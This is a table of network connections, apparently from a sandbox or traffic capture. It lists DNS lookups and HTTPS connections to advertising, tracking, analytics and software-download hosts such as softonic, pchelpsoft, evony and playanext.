| US | 8.8.8.8:53 | push-sdk.com | udp |
| BE | 66.102.1.156:443 | stats.g.doubleclick.net | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| DE | 157.90.33.121:443 | push-sdk.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 13.107.246.65:443 | www.clarity.ms | tcp |
| US | 8.8.8.8:53 | ampcid.google.com | udp |
| GB | 172.217.169.46:443 | ampcid.google.com | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| IE | 13.74.129.1:443 | c.clarity.ms | tcp |
| US | 8.8.8.8:53 | uidsync.net | udp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| US | 8.8.8.8:53 | 72.81.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.102.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.33.90.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.129.74.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.33.90.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.129.153.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | articles-img.sftcdn.net | udp |
| US | 8.8.8.8:53 | capcut.en.softonic.com | udp |
| US | 8.8.8.8:53 | sc.sftcdn.net | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | rv-assets.softonic.com | udp |
| US | 151.101.193.91:443 | rv-assets.softonic.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 151.101.129.91:443 | rv-assets.softonic.com | tcp |
| US | 151.101.129.91:443 | rv-assets.softonic.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 150.171.28.10:443 | bat.bing.com | tcp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| US | 151.101.193.91:443 | rv-assets.softonic.com | udp |
| GB | 216.58.212.206:443 | syndicatedsearch.goog | tcp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.70.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 151.101.193.91:443 | rv-assets.softonic.com | udp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | wct.softonic.com | udp |
| US | 104.26.3.63:443 | wct.softonic.com | tcp |
| GB | 216.58.212.206:443 | syndicatedsearch.goog | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0a3fe897c4d73af1d235e53a34e23c90.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 216.58.213.1:443 | 0a3fe897c4d73af1d235e53a34e23c90.safeframe.googlesyndication.com | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | id.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| NL | 18.239.18.12:443 | tags.crwdcntrl.net | tcp |
| GB | 172.217.16.226:443 | partner.googleadservices.com | tcp |
| IE | 54.170.33.189:443 | id.crwdcntrl.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| NL | 18.239.83.27:80 | crt.rootg2.amazontrust.com | tcp |
| NL | 18.239.83.27:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| DE | 138.201.56.12:443 | shb.richaudience.com | tcp |
| DE | 138.201.56.12:443 | shb.richaudience.com | tcp |
| DE | 138.201.56.12:443 | shb.richaudience.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| IE | 79.125.109.182:443 | ad.360yield.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| IE | 108.128.203.225:443 | ap.lijit.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | di-images.sftcdn.net | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| GB | 142.250.187.219:443 | storage.googleapis.com | tcp |
| NL | 18.238.243.114:443 | config.aps.amazon-adsystem.com | tcp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.18.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.33.170.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.83.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.56.201.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.203.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.109.125.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.243.238.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.68.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| GB | 216.58.204.67:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.26.3.63:443 | wct.softonic.com | tcp |
| BE | 66.102.1.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 35.244.193.51:443 | lexicon.33across.com | tcp |
| US | 8.8.8.8:53 | cdn.btmessage.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| IE | 67.220.226.232:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 104.26.7.141:443 | cdn.btmessage.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | api.btmessage.com | udp |
| NL | 139.45.197.253:443 | notix.io | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.193.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.226.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.7.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.180.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.180.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.180.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.180.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.180.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 151.101.129.91:443 | di-images.sftcdn.net | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| US | 172.64.149.180:443 | js-sec.indexww.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| GB | 92.123.240.21:443 | contextual.media.net | tcp |
| DE | 148.251.20.70:443 | sync.richaudience.com | tcp |
| GB | 23.219.196.188:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| DE | 51.38.120.206:443 | onetag-sys.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| US | 8.8.8.8:53 | api-2-0.spot.im | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | bc-sync.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 89.149.193.85:443 | ssbsync.smartadserver.com | tcp |
| GB | 2.19.117.84:443 | player.aniview.com | tcp |
| US | 3.214.207.9:443 | cs-server-s2s.yellowblue.io | tcp |
| NL | 35.214.251.135:443 | csync.loopme.me | tcp |
| GB | 2.19.117.84:443 | player.aniview.com | tcp |
| US | 3.214.207.9:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 8.2.108.175:443 | bc-sync.com | tcp |
| NL | 89.149.193.85:443 | ssbsync.smartadserver.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 8.2.108.175:443 | bc-sync.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| NL | 35.214.251.135:443 | csync.loopme.me | tcp |
| DE | 37.252.171.149:443 | secure.adnxs.com | tcp |
| DE | 37.252.171.149:443 | secure.adnxs.com | tcp |
| US | 54.147.138.47:443 | api-2-0.spot.im | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | 180.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.240.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.196.219.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.20.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.120.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 8.8.8.8:53 | sync-service.net | udp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| US | 3.217.190.136:443 | sync.srv.stackadapt.com | tcp |
| US | 204.62.12.209:443 | sync-service.net | tcp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 192.132.33.67:443 | bttrack.com | tcp |
| IE | 54.155.94.181:443 | jadserve.postrelease.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | www.opera.com | udp |
| DE | 3.122.90.30:443 | www.opera.com | tcp |
| US | 8.8.8.8:53 | 84.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.193.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.251.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.207.214.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.136.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.171.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.138.147.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.12.62.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-production-opera-website.operacdn.com | udp |
| US | 8.8.8.8:53 | 136.190.217.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.94.155.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.33.132.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.90.122.3.in-addr.arpa | udp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| GB | 104.82.234.15:443 | cdn-production-opera-website.operacdn.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | 15.234.82.104.in-addr.arpa | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| DE | 51.38.120.206:443 | onetag-sys.com | udp |
| FR | 154.54.250.80:443 | ads.stickyadstv.com | tcp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| US | 172.240.45.96:443 | sync.aniview.com | tcp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| NL | 18.239.94.101:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| FR | 51.178.195.216:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| IE | 54.155.111.174:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| GB | 23.215.239.190:443 | secure-assets.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 80.77.87.162:443 | cs.admanmedia.com | tcp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.195.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.111.155.54.in-addr.arpa | udp |
| GB | 23.215.239.190:443 | secure-assets.rubiconproject.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| GB | 92.123.242.2:443 | eus.rubiconproject.com | tcp |
| GB | 92.123.242.2:443 | eus.rubiconproject.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| FR | 51.178.195.213:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| IE | 54.76.90.176:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 98.82.157.137:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 190.239.215.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.242.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.195.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.90.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.157.82.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pc.evony.com | udp |
| US | 34.110.194.123:443 | pc.evony.com | tcp |
| US | 34.110.194.123:443 | pc.evony.com | tcp |
| US | 34.110.194.123:443 | pc.evony.com | udp |
| US | 8.8.8.8:53 | 123.194.110.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | emcl.evony.com | udp |
| CA | 76.9.213.43:443 | emcl.evony.com | tcp |
| CA | 76.9.213.43:443 | emcl.evony.com | tcp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| GB | 146.75.72.157:443 | static.ads-twitter.com | tcp |
| CA | 38.45.227.13:443 | em.evony.com | tcp |
| US | 8.8.8.8:53 | 43.213.9.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.45.38.in-addr.arpa | udp |
| CA | 38.45.227.13:443 | em.evony.com | tcp |
| DE | 162.19.138.82:443 | lb.eu-1-id5-sync.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | 3776044487a5459b443e0bd24ed13b44.safeframe.googlesyndication.com | udp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 35.244.193.51:443 | lexicon.33across.com | udp |
| DE | 157.90.33.121:443 | uidsync.net | tcp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| NL | 139.45.197.253:443 | notix.io | tcp |
| GB | 2.19.117.143:443 | aefd.nelreports.net | tcp |
| US | 8.8.8.8:53 | 143.117.19.2.in-addr.arpa | udp |
| DE | 148.251.20.70:443 | sync.richaudience.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| NL | 89.149.193.85:443 | ssbsync.smartadserver.com | tcp |
| DE | 37.252.171.149:443 | ib.adnxs.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 8.2.108.175:443 | bc-sync.com | tcp |
| NL | 35.214.251.135:443 | csync.loopme.me | tcp |
| US | 3.217.190.136:443 | sync.srv.stackadapt.com | tcp |
| US | 204.62.12.209:443 | sync-service.net | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| US | 8.2.108.175:443 | bc-sync.com | tcp |
| US | 8.8.8.8:53 | a.sportradarserving.com | udp |
| US | 8.8.8.8:53 | equativ-match.dotomi.com | udp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | tcp |
| NL | 89.207.16.201:443 | equativ-match.dotomi.com | tcp |
| FR | 51.178.195.216:443 | rtb-csync.smartadserver.com | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | udp |
| US | 8.8.8.8:53 | 141.174.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mashalearning.com | udp |
| US | 104.21.37.192:443 | mashalearning.com | tcp |
| US | 8.8.8.8:53 | 192.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.21.37.192:443 | mashalearning.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.178.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | image.mashalearning.com | udp |
| GB | 142.250.178.14:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.213.1:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 172.217.169.2:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | tcp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | offers.pchelpsoft.com | udp |
| US | 104.22.18.110:443 | offers.pchelpsoft.com | tcp |
| US | 104.22.18.110:443 | offers.pchelpsoft.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 110.18.22.104.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | cloud.pchelpsoft.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | store.pchelpsoft.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| CA | 64.18.87.10:443 | store.pchelpsoft.com | tcp |
| US | 142.250.75.99:443 | csi.gstatic.com | tcp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.86.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.87.18.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacyportal-eu.onetrust.com | udp |
| US | 104.18.32.137:443 | privacyportal-eu.onetrust.com | tcp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | partner-tracking.lavasoft.com | udp |
| US | 104.16.148.130:443 | partner-tracking.lavasoft.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 172.66.0.227:443 | t.co | tcp |
| US | 104.244.42.195:443 | analytics.twitter.com | tcp |
| US | 8.8.8.8:53 | 130.148.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pc1.evony.com | udp |
| CA | 76.9.213.153:443 | pc1.evony.com | tcp |
| CA | 76.9.213.153:443 | pc1.evony.com | tcp |
| US | 8.8.8.8:53 | 227.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.pchelpsoft.com | udp |
| NL | 18.65.39.34:443 | cdn.pchelpsoft.com | tcp |
| NL | 18.65.39.34:443 | cdn.pchelpsoft.com | tcp |
| US | 8.8.8.8:53 | 153.213.9.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.194.219.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drivers.avqtools.com | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| US | 8.8.8.8:53 | offers.playanext.com | udp |
| NL | 18.239.36.31:80 | api.playanext.com | tcp |
| NL | 18.239.94.120:443 | offers.playanext.com | tcp |
